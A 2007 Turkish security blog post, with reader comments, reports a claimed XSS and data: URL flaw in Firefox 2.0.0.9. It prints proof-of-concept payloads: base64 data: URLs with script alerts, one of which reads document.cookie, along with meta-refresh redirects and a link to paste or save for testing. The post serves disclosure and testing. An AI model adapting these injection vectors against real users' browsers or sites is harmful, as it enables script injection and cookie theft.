Bilgi Güvenliği Rehberi
Kullanıcı girişi
Gezinti
En son ağ günlüğü gönderileri
- Firefox 3.5 : Dünyanın en popüler web tarayıcısı
- NoSQL ve cloud veritabanlarının geleceği
- McAfee'den yeni bir rapor: Mapping the Mal Web
- Banka Internet şubelerinde tek kullanımlık şifre zorunlu hale geliyor!
- Apple güvenlik güncellemeleri
- Google'dan DNS hizmeti
- Sevgililer Günü için çıkacak virüslere dikkat
- Firefox 3.0.6 çıktı
- UYDUNET Kullanıcıları Paylaştığınız Dosyalara Dikkat Edin !!!
- iWork09 virüsünü bulma ve silme
Son yorumlar
- biraz alakasız sorular
2 hafta 4 gün önce - teşekkür ederim...
3 hafta 1 gün önce - # Sadece DIR altındaki
3 hafta 4 gün önce - Konu aşağıda verdiğim linkte
28 hafta 7 saat önce - ABA'dan Online Bankacılık için tavsiyeler
29 hafta 2 gün önce - Conficker hastahane bilgisayar sistemine bulaştı
31 hafta 4 gün önce - EPIC değişiklikler ile ilgili şikayette bulundu
31 hafta 4 gün önce - altaki adres örnek göstermektedir.
34 hafta 3 gün önce - Açıgınız Hakkında
34 hafta 3 gün önce - Sorunu çözdünzmü bilmiyorum
37 hafta 2 gün önce
Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.9)
November 2, 2007 yazan eno7
Gün geçmiyorki yeni açıklar çıkmasın. Bu seferki açıkta Firefox'ta bulundu. 2.0.0.8 versiyonu geçtiğimiz haftalarda çıkmasına rağmen, kısa sürede yeni açıklar tespit edildi. Ayrıca 1 Kasım da çıkan 2.0.0.9 versiyonunda da bu açığın bulunduğu gözlendi. Firefox üzerinde XSS kodlarını rahatça çalıştırabilmek ve data url scheme açığını kullanabilmek mümkün. Bu açığı test edebilmeniz için altta bazı örnek kodlar paylaştım. XSS kodunuzu bu adresten base64 koduna çevirip alttaki gibi adres çubuğunda deneyebilirsiniz Firefox'un yeni sürümü yakın zamanda çıkabilir.
Alttaki kodları Firefox'un adres çubuğuna yapıştırıp deneyebilirsiniz.
CODE:
-
(<script>alert(1);</script> base64'e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)
-
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=
-
(<script>alert(document.cookie)</script> base64'e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)
-
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
-
<META http-equiv="refresh" content="5;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
-
data:text/html,<script>alert(1)</script>
-
data:text/cmd;,test
Veya alttaki kodları html olarak kaydedip te denemeniz mümkün.
CODE:
-
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">XSS</a>
-
<META http-equiv="refresh" content="3;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
Kaynak: eno7 | http://eno7.org
- Yorum göndermek için giriş yapın veya kayıt olun
Ara
Kimler yeni
Sophos - En Son Çıkan Virüsler
İçerik paylaşımı
Yorumlar
Re: Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.9)
November 18, 2007 yazan PixeL, 2 years 36 hafta önce
Comment: 80
Bu açıkların zararları nelerdir peki ? Bundan hiç bahsedilmemiş. Bize karşı bunu nasıl kullanabilirler ?
Re: Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.9)
November 9, 2007 yazan users, 2 years 37 hafta önce
Comment: 70
Ya bu kodlar operada da işliyor??
Bunun bize tehlikesi nedir acaba?
Re: Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.9)
November 5, 2007 yazan Sayid, 2 years 38 hafta önce
Comment: 68
Şimdi denedim Mac OS X 10.4.8 üzerinde Firefox 2.0.0.9 da etkileniyor.
Re: Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.9)
November 2, 2007 yazan eno7, 2 years 38 hafta önce
Comment: 67
yeni sürüm 1 Kasım da çıkmış az önce test ettim. Malesef yeni sürümde de bu açık hala mevcut başlığı güncelledim.
Re: Mozilla Firefox’ta Yeni Bir Açık Daha (2.0.0.8)
November 2, 2007 yazan pocker_face, 2 years 38 hafta önce
Comment: 66
yeni sürümü cıkmıştır